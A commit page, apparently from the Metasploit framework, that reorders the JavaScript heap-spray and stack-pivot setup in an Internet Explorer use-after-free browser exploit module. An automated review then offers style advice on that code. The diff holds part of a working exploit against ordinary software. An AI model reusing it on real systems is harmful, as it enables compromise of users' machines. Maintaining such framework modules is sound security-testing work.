
Commit 94f841d

author
jvazquez-r7
committed
Land rapid7#1810, @wchen-r7's modification to make ie_cgenericelement_uaf more stable
2 parents f9f769c + 9043eed commit 94f841d

1 file changed

+16
-16
lines changed


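--- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -227,6 +227,22 @@ def load_exploit_html(my_target, cli)
 
 function helloWorld()
 {
+sparkle = unescape("ABCD");
+for (i=0; i < 2; i++) {
+sparkle += unescape("ABCD");
+}
+sparkle += unescape("AB");
+sparkle += unescape("#{js_payload}");
+
+magenta = unescape("#{align_esp}");
+
+for (i=0; i < 0x70/4; i++) {
+if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
+else { magenta += unescape("#{align_esp}"); }
+}
+
+magenta += sparkle;
+
 f0 = document.createElement('span');
 document.body.appendChild(f0);
 f1 = document.createElement('span');
@@ -246,22 +262,6 @@ def load_exploit_html(my_target, cli)
 f1.innerHTML = "";
 
 CollectGarbage();
-
-sparkle = unescape("ABCD");
-for (i=0; i < 2; i++) {
-sparkle += unescape("ABCD");
-}
-sparkle += unescape("AB");
-sparkle += unescape("#{js_payload}");
-
-magenta = unescape("#{align_esp}");
-
-for (i=0; i < 0x70/4; i++) {
-if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
-else { magenta += unescape("#{align_esp}"); }
-}
-
-magenta += sparkle;
 mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
 }
 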
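Review bot: The block moved to new lines 230–244 still introduces `sparkle`, `magenta` and the loop index `i` without `var`, so all three become implicit globals in the generated page and `i` is shared between the two loops; `var sparkle`, `var magenta` and `for (var i = 0; ...)` would keep them local to helloWorld without changing what is built. The expression `0x70/4` is evaluated twice (loop bound and last-iteration test) with no comment saying what the size refers to, so a short comment or a named local would help the next maintainer. Since the commit message only says the move makes the module "more stable", a one-line comment above the moved block recording why the strings must be assembled before the span elements are created would capture the reason the order matters. The enclosing Ruby method load_exploit_html begins and ends outside both hunks, and the generated helloWorld function spans the two hunks.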
